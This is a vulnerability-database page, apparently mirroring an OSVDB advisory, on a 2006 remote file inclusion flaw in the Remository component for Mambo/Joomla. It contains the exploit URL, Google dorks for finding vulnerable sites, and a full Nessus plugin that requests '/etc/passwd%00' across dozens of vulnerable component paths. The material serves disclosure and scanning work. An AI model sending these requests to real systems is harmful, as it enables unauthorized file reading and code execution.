Search...

Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion

2006-08-10T07:35:23

ID OSVDB:27903
Type osvdb
Reporter OSVDB
Modified 2006-08-10T07:35:23

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?

References:

Vendor URL: http://www.remository.com/ Secunia Advisory ID:21477 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html FrSIRT Advisory: ADV-2006-3270 CVE-2006-4130 Bugtraq ID: 19465

JSON Vulners Source

Initial Source

{"edition": 1, "title": "Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion", "bulletinFamily": "software", "published": "2006-08-10T07:35:23", "lastseen": "2017-04-28T13:20:24", "modified": "2006-08-10T07:35:23", "reporter": "OSVDB", "viewCount": 61, "href": "https://vulners.com/osvdb/OSVDB:27903", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Manual Testing Notes\nhttp://[target]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?\n## References:\nVendor URL: http://www.remository.com/\n[Secunia Advisory ID:21477](https://secuniaresearch.flexerasoftware.com/advisories/21477/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html\nFrSIRT Advisory: ADV-2006-3270\n[CVE-2006-4130](https://vulners.com/cve/CVE-2006-4130)\nBugtraq ID: 19465\n", "affectedSoftware": [], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-28T13:20:24", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4130"]}, {"type": "exploitdb", "idList": ["EDB-ID:2172"]}, {"type": "nessus", "idList": ["MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL"]}], "modified": "2017-04-28T13:20:24", "rev": 2}, "vulnersScore": 6.3}, "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "cvelist": ["CVE-2006-4130"], "id": "OSVDB:27903"}

{"cve": [{"lastseen": "2020-12-09T19:23:47", "description": "PHP remote file inclusion vulnerability in admin.remository.php in the Remository Component (com_remository) 3.25 and earlier for Mambo and Joomla!, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 5, "cvss3": {}, "published": "2006-08-14T23:04:00", "title": "CVE-2006-4130", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4130"], "modified": "2018-10-17T21:33:00", "cpe": ["cpe:/a:matt_smith:remository_for_mambo:3.25"], "id": "CVE-2006-4130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4130", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:matt_smith:remository_for_mambo:3.25:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T15:40:51", "description": "Mambo Remository Component <= 3.25 Remote Include Vulnerability. CVE-2006-4130. Webapps exploit for php platform", "published": "2006-08-10T00:00:00", "type": "exploitdb", "title": "Mambo Remository Component <= 3.25 - Remote Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4130"], "modified": "2006-08-10T00:00:00", "id": "EDB-ID:2172", "href": "https://www.exploit-db.com/exploits/2172/", "sourceData": " .:[ insecurity research team ]:.\n .__..____.:.______.____.:.____ .\n .:. | |/ \\:/ ___// __ \\:/ _\\.:.\n : | | | \\\\____\\\\ ___/\\ /__ :. .\n ..: |__|___| /____ >\\___ >\\___ >.:\n .:.. .. .\\/ .:\\/:. .\\/. .:\\/:\n . ...:. .advisory. .:...\n :..................: o9.o8.2oo6 ..\n \n \n Affected Application: Remository v3.25 \n\n (Mambo/Joomla CMS Component)\n \n \n . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n Discoverd by: camino\n \n Team: Insecurity Research Team\n \n URL: http://www.insecurityresearch.org\n \n E-Mail: camino@sexmagnet.com\n \n \n \n . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .\n \n \n Typ: Remote [x] Local [ ]\n \n Remote File Inclusion [x] SQL Injection [ ]\n \n Level: Low [ ] Middle [x] High [ ]\n \n Application: Remository\n \n Version: 3.25\n \n Vulnerable File: admin.remository.php\n \n URL: http://www.remository.com\n \n Description: It's a component that works with Mambo CMS 4.5+ to \n\n provide a selection of files that users can download. \n \n Dork: intext:\"Remository 3.25. is technology by Black Sheep Research\"\n\n inurl:\"com_remository\"\n \n \n \n . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n http://[sitepath]/[joomlapath]/administrator/components/\n\n com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?\n \n \n \n . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n o1.) open admin.remository.php\n \n o2.) take a look at line 16:\n\n require_once ($mosConfig_absolute_path.'/components/\n\n com_remository/com_remository_constants.php');\n \n o3.) take a look at line 19:\n\n defined( '_VALID_MOS' ) or die( 'Direct Access to this location \n \n is not allowed.' );\n \n o4.) exchange line 19 with line 16!\n \n \n \n . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n all the sexy members of insecurity research team ;-)\n\n# milw0rm.com [2006-08-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2172/"}], "nessus": [{"lastseen": "2021-01-20T12:09:16", "description": "A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2006-07-15T00:00:00", "title": "Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "modified": "2006-07-15T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/22049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22049);\n script_version(\"1.110\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2006-3396\",\n \"CVE-2006-3530\",\n \"CVE-2006-3556\",\n \"CVE-2006-3748\",\n \"CVE-2006-3749\",\n \"CVE-2006-3750\",\n \"CVE-2006-3751\",\n \"CVE-2006-3773\",\n \"CVE-2006-3774\",\n \"CVE-2006-3846\",\n \"CVE-2006-3947\",\n \"CVE-2006-3949\",\n \"CVE-2006-3980\",\n \"CVE-2006-3995\",\n \"CVE-2006-4074\",\n \"CVE-2006-4130\",\n \"CVE-2006-4195\",\n \"CVE-2006-4270\",\n \"CVE-2006-4288\",\n \"CVE-2006-4553\",\n \"CVE-2006-4858\",\n \"CVE-2006-5045\",\n \"CVE-2006-5048\",\n \"CVE-2006-5519\",\n \"CVE-2006-6962\",\n \"CVE-2007-1702\",\n \"CVE-2007-2005\",\n \"CVE-2007-2144\",\n \"CVE-2007-2319\",\n \"CVE-2007-3130\",\n \"CVE-2007-5310\",\n \"CVE-2007-5412\",\n \"CVE-2007-5457\",\n \"CVE-2008-0567\",\n \"CVE-2008-5789\",\n \"CVE-2008-5790\",\n \"CVE-2008-5793\",\n \"CVE-2008-6841\",\n \"CVE-2010-2918\"\n );\n script_bugtraq_id(\n 18705,\n 18808,\n 18876,\n 18919,\n 18924,\n 18968,\n 18991,\n 19037,\n 19042,\n 19044,\n 19047,\n 19100,\n 19217,\n 19222,\n 19223,\n 19224,\n 19233,\n 19373,\n 19465,\n 19505,\n 19574,\n 19581,\n 19725,\n 20018,\n 20667,\n 23125,\n 23408,\n 23490,\n 23529,\n 24342,\n 25959,\n 26002,\n 26044,\n 27531,\n 28942,\n 30093,\n 32190,\n 32192,\n 32194\n );\n script_xref(name:\"EDB-ID\", value:\"1959\");\n script_xref(name:\"EDB-ID\", value:\"2020\");\n script_xref(name:\"EDB-ID\", value:\"2023\");\n script_xref(name:\"EDB-ID\", value:\"2029\");\n script_xref(name:\"EDB-ID\", value:\"2083\");\n script_xref(name:\"EDB-ID\", value:\"2089\");\n script_xref(name:\"EDB-ID\", value:\"2125\");\n script_xref(name:\"EDB-ID\", value:\"2196\");\n script_xref(name:\"EDB-ID\", value:\"2205\");\n script_xref(name:\"EDB-ID\", value:\"2206\");\n script_xref(name:\"EDB-ID\", value:\"2207\");\n script_xref(name:\"EDB-ID\", value:\"2214\");\n script_xref(name:\"EDB-ID\", value:\"2367\");\n script_xref(name:\"EDB-ID\", value:\"2613\");\n script_xref(name:\"EDB-ID\", value:\"3567\");\n script_xref(name:\"EDB-ID\", value:\"3703\");\n script_xref(name:\"EDB-ID\", value:\"3753\");\n script_xref(name:\"EDB-ID\", value:\"4497\");\n script_xref(name:\"EDB-ID\", value:\"4507\");\n script_xref(name:\"EDB-ID\", value:\"4521\");\n script_xref(name:\"EDB-ID\", value:\"5020\");\n script_xref(name:\"EDB-ID\", value:\"5497\");\n script_xref(name:\"EDB-ID\", value:\"6003\");\n script_xref(name:\"EDB-ID\", value:\"7038\");\n script_xref(name:\"EDB-ID\", value:\"7039\");\n script_xref(name:\"EDB-ID\", value:\"7040\");\n\n script_name(english:\"Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities\");\n script_summary(english:\"Attempts to read a local file using Mambo / Joomla components and modules.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439035/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439451/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439618/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439963/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439997/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/440881/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441533/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441538/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441541/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/444425/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0607-exploits/smf.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the PHP 'register_globals' setting or contact the product's\nvendor to see if an upgrade exists.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Extcalendar RFI\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mambo_detect.nasl\", \"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\n# Generate a list of paths to check.\nmambo = get_dirs_from_kb(appname:'mambo_mos', port:port);\nif (isnull(mambo)) mambo = make_list();\n\njoomla = make_list();\njoomla_installs = get_installs(\n app_name : \"Joomla!\",\n port : port\n);\n\nif (joomla_installs[0] == IF_OK)\n{\n foreach install (joomla_installs[1])\n {\n dir = install['path'];\n joomla = make_list(dir, joomla);\n }\n}\n\ndirs = make_list(mambo, joomla);\n\nif (max_index(dirs) == 0)\n audit(AUDIT_WEB_APP_NOT_INST, \"Joomla! / Mambo\", port);\n\n# Vulnerable scripts.\n# - components.\nncoms = 0;\ncom = make_array();\n# - A6MamboCredits\ncom[ncoms++] = \"/administrator/components/com_a6mambocredits/admin.a6mambocredits.php\";\n# - Art*Links\ncom[ncoms++] = \"/components/com_artlinks/artlinks.dispnew.php\";\n# - Chrono Forms\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS/File.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php\";\n# - Clickheat\ncom[ncoms++] = \"/administrator/components/com_clickheat/install.clickheat.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/_main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/overview/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php\";\n# - Community Builder\ncom[ncoms++] = \"/administrator/components/com_comprofiler/plugin.class.php\";\n# - Coppermine Photo Gallery\ncom[ncoms++] = \"/components/com_cpg/cpg.php\";\n# - DBQ Manager\ncom[ncoms++] = \"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php\";\n# - ExtCalendar\ncom[ncoms++] = \"/components/com_extcalendar/extcalendar.php\";\n# - Feederator\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/subscription.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/tmsp.php\";\n# - Galleria\ncom[ncoms++] = \"/components/com_galleria/galleria.html.php\";\n# - Hashcash\ncom[ncoms++] = \"/components/com_hashcash/server.php\";\n# - HTMLArea3\ncom[ncoms++] = \"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php\";\n# - JD-Wiki\ncom[ncoms++] = \"/components/com_jd-wiki/lib/tpl/default/main.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/dwpage.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/wantedpages.php\";\n# - Joomla Flash Uploader\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php\";\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php\";\n# - JoomlaPack\ncom[ncoms++] = \"/administrator/components/com_jpack/includes/CAltInstaller.php\";\n# - Joomla-Visites\ncom[ncoms++] = \"/administrator/components/com_joomla-visites/core/include/myMailer.class.php\";\n# - Link Directory\ncom[ncoms++] = \"/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php\";\n# - LoudMouth\ncom[ncoms++] = \"/components/com_loudmouth/includes/abbc/abbc.class.php\";\n# - Mambatstaff\ncom[ncoms++] = \"/components/com_mambatstaff/mambatstaff.php\";\n# - MambelFish\ncom[ncoms++] = \"/administrator/components/com_mambelfish/mambelfish.class.php\";\n# - Mambo Gallery Manager\ncom[ncoms++] = \"/administrator/components/com_mgm/help.mgm.php\";\n# - Mosets Tree\ncom[ncoms++] = \"/components/com_mtree/Savant2/Savant2_Plugin_textarea.php\";\n# - mp3_allopass\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass.php\";\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass-error.php\";\n# - Multibanners\ncom[ncoms++] = \"/administrator/components/com_multibanners/extadminmenus.class.php\";\n# - PCCookbook\ncom[ncoms++] = \"/components/com_pccookbook/pccookbook.php\";\n# - Peoplebook\ncom[ncoms++] = \"/administrator/components/com_peoplebook/param.peoplebook.php\";\n# - perForms\ncom[ncoms++] = \"/components/com_performs/performs.php\";\n# - phpShop\ncom[ncoms++] = \"/administrator/components/com_phpshop/toolbar.phpshop.html.php\";\n# - PollXT\ncom[ncoms++] = \"/administrator/components/com_pollxt/conf.pollxt.php\";\n# - Recly!Competitions\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/add.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/competitions.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/settings/settings.php\";\n# - Remository\ncom[ncoms++] = \"/administrator/components/com_remository/admin.remository.php\";\n# - rsGallery\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.php\";\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.html.php\";\n# - Security Images\ncom[ncoms++] = \"/administrator/components/com_securityimages/configinsert.php\";\ncom[ncoms++] = \"/administrator/components/com_securityimages/lang.php\";\n# - Serverstat\ncom[ncoms++] = \"/administrator/components/com_serverstat/install.serverstat.php\";\n# - SiteMap\ncom[ncoms++] = \"/components/com_sitemap/sitemap.xml.php\";\n# - SMF Forum\ncom[ncoms++] = \"/components/com_smf/smf.php\";\n# - Taskhopper\ncom[ncoms++] = \"/components/com_thopper/inc/contact_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/itemstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/projectstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/request_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/responses_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/timelog_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/urgency_type.php\";\n# - User Home Pages\ncom[ncoms++] = \"/administrator/components/com_uhp/uhp_config.php\";\ncom[ncoms++] = \"/administrator/components/com_uhp2/footer.php\";\n# - VideoDB\ncom[ncoms++] = \"/administrator/components/com_videodb/core/videodb.class.xml.php\";\n# - WmT Portfolio\ncom[ncoms++] = \"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php\";\n# - modules.\nnmods = 0;\nmod = make_array();\n# - Autostand\nmod[nmods++] = \"/mod_as_category.php\";\nmod[nmods++] = \"/mod_as_category/mod_as_category.php\";\n# - FlatMenu\nmod[nmods++] = \"/mod_flatmenu.php\";\n# - MambWeather\nmod[nmods++] = \"/MambWeather/Savant2/Savant2_Plugin_options.php\";\n\n\n# Loop through each directory.\ninfo = \"\";\ncontents = \"\";\nforeach dir (list_uniq(dirs))\n{\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<ncoms; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + com[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\$/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + com[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n\n for (i=0; i<nmods; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + \"/modules/\" + mod[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + \"/modules/\" + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n}\n\nif (info)\n{\n if (empty_or_null(contents)) contents = 'The response output includes an error message which indicates that the installed component is affected. Below is the response : \\n\\n' + res;\n\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : \"/etc/passwd\",\n request : split(info),\n output : contents,\n attach_type : 'text/plain'\n );\n exit(0);\n}\nelse\n exit(0, \"No affected components were found on the web server on port \"+port+\".\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}